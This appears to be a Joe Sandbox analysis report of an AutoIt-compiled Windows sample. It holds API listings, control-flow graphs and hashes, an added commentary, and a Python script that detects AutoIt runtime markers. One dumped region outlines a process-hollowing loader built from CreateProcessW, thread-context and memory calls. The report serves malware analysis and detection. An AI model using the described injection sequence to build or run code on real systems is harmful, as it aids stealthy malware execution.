• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
• String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
• API String ID: 98802146-2727554177
• Opcode ID: 162ee6dcb699acba039095866e9c5104eeccf69605ed7a435e583f8f3c012a3e
• Instruction ID: 9e985ed61b641c7ead6cb54fa2a3443744b40e0c07aac146d53caef695313082
• Opcode Fuzzy Hash: 162ee6dcb699acba039095866e9c5104eeccf69605ed7a435e583f8f3c012a3e
• Instruction Fuzzy Hash: 7D71A271404300AEC714DF66EC8196BBBE8FFA6345F50082FF94587161EB389A4DCB5A
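The entries above are the AutoIt3 runtime's own start-up code rather than the payload: one registers the window class "AutoIt v3 GUI" and the TaskbarCreated message (RegisterClassExW / RegisterWindowMessageW), the one just above resolves the include directory from HKCU\Software\AutoIt v3\AutoIt (RegOpenKeyExW / RegQueryValueExW). Those literals survive in every compiled AutoIt executable, which makes them a cheap triage marker. The script below is an added example, not code from Joe Sandbox or from the sample; it scans a buffer for the string references listed in this report in both ASCII and UTF-16LE (the W APIs take wide strings, so that is how the binary stores them) and reports where each sits. The test buffer is constructed inline, and the marker list and the two-marker threshold are my choices, not part of the report.

```python
"""Locate compiled-AutoIt runtime markers in a file image.

Added example; not Joe Sandbox code and not the sample's code. The marker
strings are the ones this report's IDA entries reference.
"""
from __future__ import annotations

import re

# Strings the AutoIt3 runtime uses at start-up: the GUI window class passed to
# RegisterClassExW, the registry key opened with RegOpenKeyExW, and an
# interpreter error message. All three are reached through wide-string APIs in
# this report, so the binary stores them as UTF-16LE; ASCII is checked as well
# in case a packer or a dumped script carries narrow copies.
AUTOIT_MARKERS = (
    "AutoIt v3 GUI",
    "Software\\AutoIt v3\\AutoIt",
    "Variable must be of type 'Object'.",
)
ENCODINGS = ("ascii", "utf-16-le")


def find_markers(data: bytes) -> dict[str, list[tuple[str, int]]]:
    """Map each marker found in `data` to its (encoding, offset) hits."""
    hits: dict[str, list[tuple[str, int]]] = {}
    for marker in AUTOIT_MARKERS:
        for enc in ENCODINGS:
            needle = re.escape(marker.encode(enc))
            for m in re.finditer(needle, data):
                hits.setdefault(marker, []).append((enc, m.start()))
    return hits


def looks_like_compiled_autoit(data: bytes, min_markers: int = 2) -> bool:
    """Heuristic: at least two distinct runtime markers (threshold is an assumption)."""
    return len(find_markers(data)) >= min_markers


def scan_file(path: str) -> dict[str, list[tuple[str, int]]]:
    """Convenience wrapper for a file on disk."""
    with open(path, "rb") as fh:
        return find_markers(fh.read())


# Constructed test buffer, not bytes from the sample: two markers stored as
# UTF-16LE with null padding around them, the way they sit in a .rdata section.
SAMPLE = (
    b"\x00" * 16
    + "AutoIt v3 GUI".encode("utf-16-le")
    + b"\x00" * 8
    + "Software\\AutoIt v3\\AutoIt".encode("utf-16-le")
    + b"\x00" * 4
)

if __name__ == "__main__":
    for marker, where in find_markers(SAMPLE).items():
        print(marker, where)
    print("compiled AutoIt?", looks_like_compiled_autoit(SAMPLE))
```

A hit only says "compiled AutoIt", not "malicious": the interpreter is a legitimate runtime and the functions on this page that register the GUI class, read the include path or run the message pump are stock AutoIt3 code. The behaviour that matters lives in the embedded script, so once the markers match, the productive next step is to extract that script resource rather than reverse the interpreter.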

Control-flow Graph

APIs
• GetSysColorBrush.USER32(0000000F), ref: 00452B8E
• LoadCursorW.USER32(00000000,00007F00), ref: 00452B9D
• LoadIconW.USER32(00000063), ref: 00452BB3
• LoadIconW.USER32(000000A4), ref: 00452BC5
• LoadIconW.USER32(000000A2), ref: 00452BD7
• LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00452BEF
• RegisterClassExW.USER32(?), ref: 00452C40
  • Part of subcall function 00452CD4: GetSysColorBrush.USER32(0000000F), ref: 00452D07
  • Part of subcall function 00452CD4: RegisterClassExW.USER32(00000030), ref: 00452D31
  • Part of subcall function 00452CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00452D42
  • Part of subcall function 00452CD4: InitCommonControlsEx.COMCTL32(?), ref: 00452D5F
  • Part of subcall function 00452CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00452D6F
  • Part of subcall function 00452CD4: LoadIconW.USER32(000000A9), ref: 00452D85
  • Part of subcall function 00452CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00452D94
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
• String ID: #$0$AutoIt v3
• API String ID: 423443420-4155596026
• Opcode ID: 6f2bb169402da565ff5b4824348857a83772fccae544e9ef5fa34f83f117c5fd
• Instruction ID: bbe770da247e8ab765be7760bb19ae07f899debc41133c7f5c59f942ee3ea077
• Opcode Fuzzy Hash: 6f2bb169402da565ff5b4824348857a83772fccae544e9ef5fa34f83f117c5fd
• Instruction Fuzzy Hash: B2216070D00754ABCB20DF95EC84AAA7FB5FF39B51F00042AE500A6261D3B5054AEF8C
APIs
• __Init_thread_footer.LIBCMT ref: 0045BB4E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Init_thread_footer
• String ID: p#R$p#R$p#R$p#R$p%R$p%R$x#R$x#R
• API String ID: 1385522511-3327339328
• Opcode ID: a1bb9dcc87ab296947c41b0a722bd10c6ddfa7bbf2fd5a78e8deca8dabdf0235
• Instruction ID: 48c34529fc222ab3d0f06bb8e80433b5bba247e60ee34224d2c712e69376c51e
• Opcode Fuzzy Hash: a1bb9dcc87ab296947c41b0a722bd10c6ddfa7bbf2fd5a78e8deca8dabdf0235
• Instruction Fuzzy Hash: A132CE74A00209AFCB20CF54C894ABEB7B5EF55305F14805BED05AB352D77CAD4ACB9A

Control-flow Graph (recovered from the graph dump): window procedure at 0x453170, basic blocks 0x453170-0x45326D plus out-of-line blocks at 0x492D9C-0x492E96. The message switch reaches PostQuitMessage (0x453265), KillTimer (0x453201), SetTimer followed by RegisterWindowMessageW and CreatePopupMenu (0x45321D-0x453251), MoveWindow (0x492DD7), SetFocus (0x492DC6), and falls through to DefWindowProcW (0x4531D0) for everything else. Subcalls: 004530F2, 00453C50, 0045326F, 004518E2, 0046E499, 004BBF30, 004BC161, 004B0AD7, 00453837.

APIs
• DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0045316A,?,?), ref: 004531D8
• KillTimer.USER32(?,00000001,?,?,?,?,?,0045316A,?,?), ref: 00453204
• SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00453227
• RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0045316A,?,?), ref: 00453232
• CreatePopupMenu.USER32 ref: 00453246
• PostQuitMessage.USER32(00000000), ref: 00453267
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
• String ID: TaskbarCreated
• API String ID: 129472671-2362178303
• Opcode ID: 2883b60b272fd690364ecc3d7eb8f45992c65bb636f35196ed3620f0ff07c5c9
• Instruction ID: 2e9e445818c933befdf3cbbd8faf241046543153f75236d5f89c6358da241ee6
• Opcode Fuzzy Hash: 2883b60b272fd690364ecc3d7eb8f45992c65bb636f35196ed3620f0ff07c5c9
• Instruction Fuzzy Hash: 20413C31200A44B6DF245F789D8977B3A55EB26387F04053BFD0285293CB7C9E4A976E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID:
• String ID: D%R$D%R$D%R$D%R$D%RD%R$Variable must be of type 'Object'.
• API String ID: 0-2179602762
• Opcode ID: 1a15e64aa3076951adc1ea9c61ae1d056c9832b4b555530df67f96d211ebc0de
• Instruction ID: 418439cd600da5647ab97e058660e1f3680074b6c00073804152033f072f2003
• Opcode Fuzzy Hash: 1a15e64aa3076951adc1ea9c61ae1d056c9832b4b555530df67f96d211ebc0de
• Instruction Fuzzy Hash: 6DC2C374E00214DFCB18CF5AC880AAEB7B1BF19305F14855AED45AB352E339EE46CB59

Control-flow Graph (recovered from the graph dump): function at 0x1572B30, basic blocks 0x1572B30-0x1572E32. Main path: call 01570560, call 01573A40, CreateFileW (0x1572BE5), VirtualAlloc (0x1572C29), ReadFile (0x1572C4A), a second VirtualAlloc (0x1572C68), repeated calls to 01573C90 in a loop (0x1572CD5-0x1572D10), call 01573AA0, CloseHandle (0x1572D30) and VirtualFree (0x1572D40); the block at 0x1572D4E-0x1572D57 either exits or loops back to the CreateFileW block, and a second VirtualFree sits in the tail at 0x1572E1C. Every failed check (0x1572C0D, 0x1572C24, 0x1572C45, 0x1572C63, 0x1572CAA, 0x1572D28) jumps to the common exit at 0x1572D5D.

APIs
• CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01572C01
• VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01572E27
Memory Dump Source
• Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: CreateFileFreeVirtual
• String ID:
• API String ID: 204039940-0
• Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction ID: ae1671cc4d52fa239cb8c0114ad4e5c5c5212451fa4b4533e65cccd5f4074a22
• Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
• Instruction Fuzzy Hash: 84A13970E00209EBDB14CFA4D895BEEBBB5FF48304F208559E615BB280D7759A81CFA5

                                                                                Control-flow Graph

                                                                                control_flow_graph 1280 452c63-452cd3 CreateWindowExW * 2 ShowWindow * 2
                                                                                APIs
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00452C91
                                                                                • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00452CB2
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00451CAD,?), ref: 00452CC6
                                                                                • ShowWindow.USER32(00000000,?,?,?,?,?,?,00451CAD,?), ref: 00452CCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Window$CreateShow
                                                                                • String ID: AutoIt v3$edit
                                                                                • API String ID: 1584632944-3779509399
                                                                                • Opcode ID: c322a459154e2023331b41ba5cae26efdd608427491458ce4be9cf1917d9e86c
                                                                                • Instruction ID: 77ce28273410a2a23bae70a799f65388917272fbd7a0899a37fd4ebf9f721931
                                                                                • Opcode Fuzzy Hash: c322a459154e2023331b41ba5cae26efdd608427491458ce4be9cf1917d9e86c
                                                                                • Instruction Fuzzy Hash: D8F03AB55403D47AEB304713AC88E772EBEDBFBF51F01046AF900A61A0C6750846EAB8

                                                                                Control-flow Graph

                                                                                control_flow_graph 1395 1572910-1572a27 call 1570560 call 1572800 CreateFileW 1402 1572a2e-1572a3e 1395->1402 1403 1572a29 1395->1403 1406 1572a45-1572a5f VirtualAlloc 1402->1406 1407 1572a40 1402->1407 1404 1572ade-1572ae3 1403->1404 1408 1572a63-1572a7a ReadFile 1406->1408 1409 1572a61 1406->1409 1407->1404 1410 1572a7e-1572ab8 call 1572840 call 1571800 1408->1410 1411 1572a7c 1408->1411 1409->1404 1416 1572ad4-1572adc ExitProcess 1410->1416 1417 1572aba-1572acf call 1572890 1410->1417 1411->1404 1416->1404 1417->1416
                                                                                APIs
                                                                                  • Part of subcall function 01572800: Sleep.KERNELBASE(000001F4), ref: 01572811
                                                                                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01572A1D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFileSleep
                                                                                • String ID: 52NAUXAHBMWDI8DM95PX
                                                                                • API String ID: 2694422964-3727761029
                                                                                • Opcode ID: e5e67129ec0cbbf1694b2130d32280ec371ee25dd501bd27416fbd17088ae22f
                                                                                • Instruction ID: 93e3fe94078dd53af7145e83c42ad9f96b1644a65ef6e514267858f94eb43e0e
                                                                                • Opcode Fuzzy Hash: e5e67129ec0cbbf1694b2130d32280ec371ee25dd501bd27416fbd17088ae22f
                                                                                • Instruction Fuzzy Hash: A751A270D0429DDAEF11DBA4D909BEFBBB5AF55300F004199E6087B2C0D7B91B48CBA5

                                                                                Control-flow Graph

                                                                                control_flow_graph 1729 453b1c-453b27 1730 453b99-453b9b 1729->1730 1731 453b29-453b2e 1729->1731 1732 453b8c-453b8f 1730->1732 1731->1730 1733 453b30-453b48 RegOpenKeyExW 1731->1733 1733->1730 1734 453b4a-453b69 RegQueryValueExW 1733->1734 1735 453b80-453b8b RegCloseKey 1734->1735 1736 453b6b-453b76 1734->1736 1735->1732 1737 453b90-453b97 1736->1737 1738 453b78-453b7a 1736->1738 1739 453b7e 1737->1739 1738->1739 1739->1735
                                                                                APIs
                                                                                • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B40
                                                                                • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B61
                                                                                • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00453B0F,SwapMouseButtons,00000004,?), ref: 00453B83
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CloseOpenQueryValue
                                                                                • String ID: Control Panel\Mouse
                                                                                • API String ID: 3677997916-824357125
                                                                                • Opcode ID: 0799aed9cfb6e8a3db0299d0f0c9765f66eec20c0aefd290f15f7e6fd8cca84c
                                                                                • Instruction ID: c0f1b17a16642853538207c4c90912c435799b0c933145cfe96032cee888ed44
                                                                                • Opcode Fuzzy Hash: 0799aed9cfb6e8a3db0299d0f0c9765f66eec20c0aefd290f15f7e6fd8cca84c
                                                                                • Instruction Fuzzy Hash: 44113CB5510218FFDB20CFA5DC84EAFB7B8EF04786B10456AF805D7212D235AF459768

                                                                                Control-flow Graph

                                                                                control_flow_graph 1740 1571800-15718a0 call 1573c70 * 3 1747 15718b7 1740->1747 1748 15718a2-15718ac 1740->1748 1749 15718be-15718c7 1747->1749 1748->1747 1750 15718ae-15718b5 1748->1750 1751 15718ce-1571f80 1749->1751 1750->1749 1752 1571f93-1571fc0 CreateProcessW 1751->1752 1753 1571f82-1571f86 1751->1753 1759 1571fc2-1571fc5 1752->1759 1760 1571fca 1752->1760 1754 1571fcc-1571ff9 1753->1754 1755 1571f88-1571f8c 1753->1755 1771 1572003 1754->1771 1772 1571ffb-1571ffe 1754->1772 1757 1572005-1572032 1755->1757 1758 1571f8e 1755->1758 1762 157203c-1572056 Wow64GetThreadContext 1757->1762 1781 1572034-1572037 1757->1781 1758->1762 1764 15723c1-15723c3 1759->1764 1760->1762 1765 157205d-1572078 ReadProcessMemory 1762->1765 1766 1572058 1762->1766 1767 157207f-1572088 1765->1767 1768 157207a 1765->1768 1770 157236a-157236e 1766->1770 1776 15720b1-15720d0 call 15732f0 1767->1776 1777 157208a-1572099 1767->1777 1768->1770 1773 1572370-1572374 1770->1773 1774 15723bf 1770->1774 1771->1762 1772->1764 1778 1572376-1572382 1773->1778 1779 1572389-157238d 1773->1779 1774->1764 1788 15720d7-15720fa call 1573430 1776->1788 1789 15720d2 1776->1789 1777->1776 1782 157209b-15720aa call 1573240 1777->1782 1778->1779 1784 157238f-1572392 1779->1784 1785 1572399-157239d 1779->1785 1781->1762 1781->1764 1782->1776 1793 15720ac 1782->1793 1784->1785 1790 157239f-15723a2 1785->1790 1791 15723a9-15723ad 1785->1791 1799 1572144-1572165 call 1573430 1788->1799 1800 15720fc-1572103 1788->1800 1789->1770 1790->1791 1795 15723af-15723b5 call 1573240 1791->1795 1796 15723ba-15723bd 1791->1796 1793->1770 1795->1796 1796->1764 1806 1572167 1799->1806 1807 157216c-157218a call 1573c90 1799->1807 1802 1572105-1572136 call 1573430 1800->1802 1803 157213f 1800->1803 1810 157213d 1802->1810 1811 1572138 1802->1811 1803->1770 1806->1770 1813 1572195-157219f 1807->1813 1810->1799 1811->1770 1814 15721d5-15721d9 1813->1814 
1815 15721a1-15721d3 call 1573c90 1813->1815 1817 15722c4-15722e1 call 1572e40 1814->1817 1818 15721df-15721ef 1814->1818 1815->1813 1825 15722e3 1817->1825 1826 15722e8-1572307 Wow64SetThreadContext 1817->1826 1818->1817 1821 15721f5-1572205 1818->1821 1821->1817 1824 157220b-157222f 1821->1824 1827 1572232-1572236 1824->1827 1825->1770 1829 157230b-1572316 call 1573170 1826->1829 1830 1572309 1826->1830 1827->1817 1828 157223c-1572251 1827->1828 1831 1572265-1572269 1828->1831 1836 157231a-157231e 1829->1836 1837 1572318 1829->1837 1830->1770 1833 15722a7-15722bf 1831->1833 1834 157226b-1572277 1831->1834 1833->1827 1838 15722a5 1834->1838 1839 1572279-15722a3 1834->1839 1840 1572320-1572323 1836->1840 1841 157232a-157232e 1836->1841 1837->1770 1838->1831 1839->1838 1840->1841 1843 1572330-1572333 1841->1843 1844 157233a-157233e 1841->1844 1843->1844 1845 1572340-1572343 1844->1845 1846 157234a-157234e 1844->1846 1845->1846 1847 1572350-1572356 call 1573240 1846->1847 1848 157235b-1572364 1846->1848 1847->1848 1848->1751 1848->1770
                                                                                APIs
                                                                                • CreateProcessW.KERNELBASE(?,00000000), ref: 01571FBB
                                                                                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01572051
                                                                                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01572073
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1707942713.0000000001570000.00000040.00000020.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_1570000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                • String ID:
                                                                                • API String ID: 2438371351-0
                                                                                • Opcode ID: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                • Instruction ID: d86898944d4babe8feedbeea3237b01ef43aba99ef1938c7c5cdf33fd48861d8
                                                                                • Opcode Fuzzy Hash: a1064bca5dd4e59baeb4dd15c17425526c3ac906ac097e7eb484fd7342f8cad6
                                                                                • Instruction Fuzzy Hash: 08620930A14658DBEB24CFA4D841BDEB776FF58300F1091A9D20DEB290E7759E81CB5A

                                                                                Control-flow Graph

                                                                                control_flow_graph 1850 453923-453939 1851 453a13-453a17 1850->1851 1852 45393f-453954 call 456270 1850->1852 1855 493393-4933a2 LoadStringW 1852->1855 1856 45395a-453976 call 456b57 1852->1856 1858 4933ad-4933b6 1855->1858 1862 4933c9-4933e5 call 456350 call 453fcf 1856->1862 1863 45397c-453980 1856->1863 1860 453994-453a0e call 472340 call 453a18 call 474983 Shell_NotifyIconW call 45988f 1858->1860 1861 4933bc-4933c4 call 45a8c7 1858->1861 1860->1851 1861->1860 1862->1860 1876 4933eb-493409 call 4533c6 call 453fcf call 4533c6 1862->1876 1863->1858 1864 453986-45398f call 456350 1863->1864 1864->1860 1876->1860
                                                                                APIs
                                                                                • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 004933A2
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00453A04
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: IconLoadNotifyShell_String_wcslen
                                                                                • String ID: Line:
                                                                                • API String ID: 2289894680-1585850449
                                                                                • Opcode ID: 86bd55c1ce74b6268eb977d4a393d90a6f47b32a6de27387a1159676b12fcdb9
                                                                                • Instruction ID: 562472130365bf0e86ae9b11a79810b69766e2e0060a534b3e6ad91e703bf383
                                                                                • Opcode Fuzzy Hash: 86bd55c1ce74b6268eb977d4a393d90a6f47b32a6de27387a1159676b12fcdb9
                                                                                • Instruction Fuzzy Hash: F631A5B1408304AAC721EF20D845ADB77D8AF6175AF00492FF99983192DB789A5DC7CA
                                                                                APIs
                                                                                • GetOpenFileNameW.COMDLG32(?), ref: 00492C8C
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 00452DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00452DC4
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Name$Path$FileFullLongOpen
                                                                                • String ID: X$`eQ
                                                                                • API String ID: 779396738-2904587998
                                                                                • Opcode ID: 205e8b6377a105ec0b3764a539352365e3c0d6c0a22f379875c480bbd2262247
                                                                                • Instruction ID: a3580d9681f84e20467c58091f6e55e0b5d8aaaf6a99f5c909ac9f153a438ac3
                                                                                • Opcode Fuzzy Hash: 205e8b6377a105ec0b3764a539352365e3c0d6c0a22f379875c480bbd2262247
                                                                                • Instruction Fuzzy Hash: 8B21C671A00258AFDF01DF95C8457EE7BF9AF49309F00405BE805AB242DBF8598DCB69
                                                                                APIs
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00470668
                                                                                  • Part of subcall function 004732A4: RaiseException.KERNEL32(?,?,?,0047068A,?,00521444,?,?,?,?,?,?,0047068A,00451129,00518738,00451129), ref: 00473304
                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00470685
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Exception@8Throw$ExceptionRaise
                                                                                • String ID: Unknown exception
                                                                                • API String ID: 3476068407-410509341
